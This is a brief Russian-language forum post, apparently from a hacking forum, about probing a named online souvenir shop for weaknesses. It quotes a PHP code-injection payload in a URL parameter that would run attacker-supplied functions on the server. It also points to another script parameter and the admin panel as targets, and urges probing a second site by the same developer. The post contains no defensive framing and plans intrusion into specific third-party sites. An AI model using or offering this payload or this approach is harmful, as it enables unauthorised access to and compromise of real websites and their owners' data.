может я не прав но судя по адресу картинки, адрес дефолтный http://www.suvenirow.ru/admin/pictures/93893s.jpg
интересно вот что: PHP: http://www.suvenirow.ru/imgpack.php?p=<?=($_=GET[2]).@$_($_GET[1])?> http://www.suvenirow.ru/imgbox.php?l= может здесь че можно сделать?
admin/ там она наверняка, но вот как к ней пройти фиг знает)) покопай вот тут evruka.ru, тоже его проект и тоже дыры есть.